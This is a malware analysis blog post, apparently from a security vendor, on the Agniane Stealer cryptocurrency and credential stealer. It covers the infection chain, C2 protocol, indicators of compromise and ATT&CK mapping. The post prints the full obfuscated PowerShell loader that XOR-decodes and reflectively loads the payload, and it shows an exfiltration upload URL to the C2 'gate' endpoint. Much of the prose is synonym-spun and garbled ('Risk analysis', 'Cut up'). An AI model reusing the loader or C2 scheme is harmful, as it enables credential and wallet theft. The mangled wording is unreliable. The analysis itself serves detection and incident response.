The Agniane Stealer is an information-stealing malware primarily concentrating on the cryptocurrency wallets of its victims. It gained recognition on the web beginning in August 2023. Just lately, now we have noticed a definite marketing campaign spreading it throughout our telemetry. Our latest research has led to the profitable identification and detailed evaluation of a beforehand unrecognized community URL sample. Our researchers have lately uncovered extra info on the malware’s strategies for file assortment and the intricacies of its command and management (C2) protocol. We even have new reverse engineering insights into the malware’s structure and communication.
We imagine our work contributes to tactical and operational ranges of intelligence concerning Agniane Stealer. It may possibly show helpful from incident response to detector growth and can be extra appropriate for a technical viewers.
The Agniane Stealer has already been referenced in a number of articles. The Agniane stealer malware is being actively marketed and bought by means of a Telegram channel, accessible at t[.]me/agniane. Potential patrons could make purchases straight through this channel by interacting with a specialised bot, named @agnianebot, which facilitates the transaction course of and offers extra details about the malware.” Our technical evaluation signifies that it makes use of the ConfuserEx Protector and goals at an identical targets. Nonetheless, it employs a definite C2 methodology, based mostly on the pattern noticed in our telemetry information. Subsequently, now we have determined to publish a technical evaluation of the pattern.
Introduction
Throughout our threat-hunting workouts in November 2023, now we have observed a sample of renamed PowerShell binaries, referred to as passbook.bat.exe. On nearer inspection of the host machines, now we have recognized infections of the newly found malware household of Agniane Stealer. Risk analysis Gameel Ali (@MalGamy12) first disclosed the existence of this malware on their X account. Researchers from the Zscaler ThreatLabz Workforce [2] and Pulsedive Risk Researchers [3] ultimately adopted up with weblog posts of their very own. Our work goals to contribute extra info understanding campaigns involving the usage of Agniane Stealer.
Execution Chain
The infections we detected appear to start out with the downloading of ZIP recordsdata from compromised web sites. All of the web sites from the place now we have seen the obtain of this file in our telemetry are regular web sites with respectable content material. All obtain URLs had the under URL sample:
http[s]://<area identify>/book_[A-Z0-9]+-d+.zip
As soon as downloaded and extracted, the downloaded ZIP file drops a BAT file (passbook.bat) and extra ZIP file on the file system. The BAT file incorporates an obfuscated payload and after its execution by means of cmd.exe, it drops an executable which is renamed model of PowerShell binary (passbook.bat.exe). [4]
This enamed PowerShell was used to execute sequence of obfuscated instructions.
passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::(‘txeTllAdaeR'[-1..-11] -join ”)(‘C:UsersuserAppDataLocalTemp15Rar$DIa63532.21112passbook.bat’).Cut up([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) { if ($_CASH_OjmGK.StartsWith(‘:: @’)) { $_CASH_ceCmX = $_CASH_OjmGK.Substring(4); break; }; };$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Substitute($_CASH_ceCmX, ‘_CASH_’, ”);$_CASH_afghH = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)(‘ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is=’);for ($i = 0; $i -le $_CASH_afghH.Size – 1; $i++) { $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); };$_CASH_DIacp = New-Object System.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object System.IO.MemoryStream;$_CASH_QbnHO = New-Object System.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::(‘daoL'[-1..-4] -join ”)($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null, (, [string[]] (”)))
The command line proven above performs the next actions:
- Reads the content material of the beforehand extracted BAT file (passbook.bat).
- By means of string matches and replacements, builds the payload dynamically and assigns it to a variable.
- Transformed payload and static key from Base64 to a byte array.
- XOR’d the payload utilizing a static key.
- Decompressed XOR’d payload utilizing GZIP.
- Invokes payload after reflectively loading it into reminiscence.
To grasp actions taken towards the target, we reversed the payload.
Binary Evaluation
The invoked payload continues with the execution of a C# meeting. We’ve got dumped it right into a file, the place we get the executable with under hash,
5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df.
At time of the evaluation, the file was unknown to on-line sandboxes. We’ve got determined to emulate the exercise on the Cisco Safe Malware Analytics sandbox with the generic settings on this file, which is the second stage of the deployment of the stealer. The dynamic evaluation couldn’t be accomplished as we didn’t execute the primary stage of the pattern of the malware. Subsequently, we determined to research the pattern manually, the place we discovered later there are anti-sandbox strategies used.
The binary file was extremely obfuscated with management circulation manipulations, like ConfuserEx.
You will need to notice that the pattern didn’t include a signature for ConfuserEx, but it had an obfuscation methodology that resembled it.
After reversing the pattern, we realized it incorporates one other binary file in its sources part, which had been getting reflectively loaded. The brand new binary was one other C#-based pattern, which contained the ultimate payload. It was obfuscated with ConfuserEx with direct signatures.
As you may see from the earlier screenshot, it’s calling Invoke features from an entry Level object, which incorporates a parsed useful resource.
Your entire loading course of seems as if passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in flip, is operating the tmp385C.tmp (tmp385C.tmp is only a header file identify) C# purposes, which reflectively load the _CASH_78 C# software. The ultimate software on this sequence is the Agniane Stealer:
Command and Management
The Agniane Stealer operates in an easy but environment friendly method, stealing credentials and recordsdata from the endpoint utilizing a primary C2 protocol. Initially, it verifies the provision of any domains by means of a easy C# net request, checking if the return worth is “13.” This time request was made to a URL labeled “check,” as an illustration.
| WebClient wc = new WebClient();
urlData = wc.DownloadString(“https://trecube[.]com/check”); If urlData == “13” { list_of_active_c2.Add(“trecube[.]com”) proceed; } |
In our pattern, we are able to see the next IOCs (indicators of compromise) offered in sources file:
trecube[.]com
trecube13[.]ru
imitato23[.]retailer
wood100home[.]ru
For all these domains, the pattern is looking for a check URL.
Later, the malware calls C2 to get a listing of file extensions to search for. That is positioned at URL sample getext?id= adopted by an ID – part of sources of the _CASH_78 file. On this web site, the checklist of extensions is separated by a semicolon, and for instance on an internet site trecube[.]retailer it seems to be like:
| *.txt; *.doc; *.docx; *.pockets; *seed* |
Once more, that is dealt with as earlier checking string within the code. It’s parsed/break up by semicolon and a listing of extensions is created in a listing of variables in C# code.
Subsequently, the malware requests a distant json file containing the main points about errors, VirusTotal hits, and so on. Based mostly on this info, the pattern both progresses or halts. We selected to focus our investigation on different points which can be extra straight related to attribution and detection settings. Nonetheless, you will need to notice that the URL sample might be utilized for monitoring malware by means of telemetry or on-line sandbox companies for OSINT functions. The URL seems to be like:
| hxxps://trecube13[.]ru/getjson?id=67 |
And right here what its corresponding output seems to be like:
| {
“debug”: “0”, “emulate”: “0”, “virtualbox”: “1”, “virustotal”: “0”, “error”: “0”, “errorname”: “NONE”, “errortext”: “NONE” “competitor”: “0” } |
The subsequent stage entails enumeration and assortment. It scans the pc to gather all paperwork with specified extensions instructed by the URL with a “getext” sample, together with different credentials present in widespread paths of the working system, equivalent to Mozilla Firefox storage, Chrome storage and saved Home windows credentials. This can be a widespread exercise amongst info stealer malware. Moreover, Agniane was checking to see the localization setting of the sufferer pc. If it incorporates any of the language packages under, it doesn’t proceed with the an infection,
| ru-RU
kk-KZ ro-MD uz-UZ be-BY az-Latn-AZ hy-AM ky-KG tg-Cyrl-TJ |
The allowlisting of some areas also can imply the developer doesn’t need to assault particular areas. Based mostly on different observations it’s doable to count on the attacker is from a rustic with a robust diplomatic tie to Russia.
As soon as all of the goal recordsdata are collected, the malware creates a ZIP archive below the “native software information” folder,
C:Customers[user]AppDataLocal[A-Z0-9]{32}
Beneath is the construction/content material of this archive file
| Agniane Stealer.txt //added as attachement right here
Installe Apps.txt //added as attachement right here PC Data.txt //added as attachement right here Recordsdata from Desktop //FOLDER – incorporates exfiltrated recordsdata from Desktop folder Recordsdata from … //FOLDER – incorporates exfiltrated recordsdata from …
… //and different folders, which include exfiltrated recordsdata. |
It’s later uploaded to
| https://trecube[.]com/gate?id=67&construct=BAT&passwords=0&cookies=124&username=johnny&nation=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0 |
Beneath you could find the illustrated model of the Agniane Stealer’s C2 communication,
Different TTPs
The Agniane Stealer was additionally seen performing following actions:
- Enumerating registry key HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall for put in purposes, it additionally collects this info.
- Checking for a public IP on a ip-api.com, i.e,
https://ip-api.com/json/?fields=11827 - Dumping Bitcoin and different cryptocurrency wallets
- Performing (not properly) checks to see if it’s operating in a debugged or digital env. and so on.
- Gathering pockets.dat recordsdata.
- Enumerating Profile and Consumer information.
- Gathering saved bank cards.
- Including different malware like NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).
Conclusion
The Agniane Stealer tries to stay undetected by means of numerous obfuscation and anti-VM/debug strategies. It displays widespread habits for stealers equivalent to amassing and exfiltrating recordsdata, credentials password, bank card particulars, wallets, and so on. Its evasive nature and concentrating on of varied info may appeal to extra adversaries in future to leverage its companies.
Kill Chain
| Kill Chain | Exercise | TTP |
| Weaponization | Use of PowerShell, ZIP file, batch file | T1059.005 T1059.001 |
| Supply | ZIP file downloaded by the browser | T1204.002 |
| Use of compromised web sites | T1584.004 | |
| Exploitation | Working Obfuscated PowerShell payload | T1059.001 T1027.010 |
| PowerShell decrypts payload utilizing XOR and decompress utilizing Gunzip | T1140 T1059.001 |
|
| Reflective loading of the payload by means of Powershell | T1059.001 T1204.002 T1620 |
|
| Use of Renamed PowerShell | T1036.003 | |
| Set up | ||
| Command and Management | ||
| Actions on Targets | Assortment of varied info from the host | T1119 |
| Focusing on of credentials | T1555 |
Indicators of Compromise
| Sort | Stage | IOC (indicators of compromise) |
| File Hash | Supply | 5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df |
| File Hash | Supply | e59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574 |
| File Hash | Supply | b2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87 |
| Area | C2 | trecube[.]com |
| Area | C2 | trecube[.]retailer |
| Area | C2 | trecube13[.]ru |
| Area | C2 | imitato23[.]retailer |
| Area | C2 | wood100home[.]ru |
References
[1] https://twitter.com/MalGamy12/standing/1688984207752663040?t=xECvfQF8pujQERAmhfI41w
[2] https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-web-s-crypto-threat
[3] https://weblog.pulsedive.com/analyzing-agniane-stealer/
[4] https://www.pcrisk.com/removal-guides/27510-agniane-stealer
We’d love to listen to what you assume. Ask a Query, Remark Beneath, and Keep Linked with Cisco Safety on social!
Cisco Safety Social Channels
Share: